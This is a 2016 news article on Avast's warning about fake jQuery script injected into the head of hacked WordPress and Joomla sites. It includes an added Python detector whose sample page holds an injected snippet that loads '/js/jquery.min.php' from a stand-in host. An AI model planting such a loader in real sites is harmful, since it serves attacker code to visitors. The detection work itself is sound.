Tuesday, April 5, 2016

WordPress, Joomla Attacks That Inject Fake jQuery Undetectable by Website Visitors

Cybersecurity provider Avast is warning WordPress and Joomla users about the recent popularity of attacks injecting fake jQuery script into the head section of websites. jQuery is popular among developers as a library of tools to implement JavaScript code across different browsers, and Avast said it is becoming popular for other, less benign uses.

Cybercriminals can inject the fake script by changing a single "var base =" line to point to a hacked website, which is the source of the malicious "/js/jquery.min.php" script, according to a blog post on Avast's website. The company says the number of hacked domains is "abnormally high," resulting in 4.5 million user attacks registered by Avast in daily attacks since November. Almost 70 million unique files have been found with malicious code on hacked websites.

A normal visitor who does not inspect the source code will not notice any difference in the website, because the script sits in the head section, before the closing </head> tag.
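A defender-side check for the pattern described above, as an added example that is not from Avast or the original article: it parses a page's head section and flags scripts that tie "/js/jquery.min.php" to a host other than the site's own. The exact shape of the injected snippet, the names `HeadScripts` and `find_fake_jquery`, and the `.example` hosts are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

INDICATOR = "/js/jquery.min.php"  # script path named in the article
BASE_RE = re.compile(r"""var\s+base\s*=\s*["']([^"']+)["']""")

class HeadScripts(HTMLParser):
    """Collect [src, inline body] for each <script> inside <head>."""
    def __init__(self):
        super().__init__()
        self.in_head = self.in_script = False
        self.scripts = []
    def handle_starttag(self, tag, attrs):
        if tag == "head":
            self.in_head = True
        elif tag == "script" and self.in_head:
            self.in_script = True
            self.scripts.append([dict(attrs).get("src") or "", ""])
    def handle_endtag(self, tag):
        if tag == "head":
            self.in_head = False
        elif tag == "script":
            self.in_script = False
    def handle_data(self, data):
        if self.in_script:
            self.scripts[-1][1] += data

def find_fake_jquery(html, site_host):
    """Return (kind, url) for head scripts that pull the file from another host."""
    parser = HeadScripts()
    parser.feed(html)
    findings = []
    for src, body in parser.scripts:
        if INDICATOR in src and urlparse(src).hostname not in (None, site_host):
            findings.append(("external-src", src))
        m = BASE_RE.search(body)
        host = urlparse(m.group(1)).hostname if m else None
        if host and host != site_host and INDICATOR in body:
            findings.append(("inline-base", m.group(1)))
    return findings

# Constructed sample (assumed shape of the injection); hosts are placeholders.
SAMPLE = """<html><head><title>Shop</title>
<script src="/wp-includes/js/jquery/jquery.js"></script>
<script>var base = "http://hacked.example";
var s = document.createElement("script"); s.src = base + "/js/jquery.min.php";
document.head.appendChild(s);</script>
</head><body>Hello</body></html>"""
```

Calling `find_fake_jquery(SAMPLE, "shop.example")` reports the inline "var base" line; run it over rendered pages or theme header templates and review any finding by hand before changing files.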

Avast recommends the standard security measures, urges WordPress and Joomla users not to delete their system files, and reminds them that updating to newer versions tends to provide better security. It also refers website operators to their web hosts.

"You may think, why me? But there could be more websites with the same problem, especially if you use shared hosting. It is worth asking your hosting provider for some advice. It is very common that hosting providers run some community forum along with their services. These forums are the best way to share your problem and experiences. Also this can be the fastest way to deal with a problem, because more people can be involved," said Avast researcher Alexej Savčin in the blog post. "Your hosting provider might also be able to confirm if a hack is an actual hack or a loss of service."

Zero Day also points out a parallel with the KimcilWare ransomware, which was developed from an educational tool, and recently began to be used against sites running Magento.

jQuery plugin FancyBox was used to attack WordPress sites last year.


Source: WordPress, Joomla Attacks That Inject Fake jQuery Undetectable by Website Visitors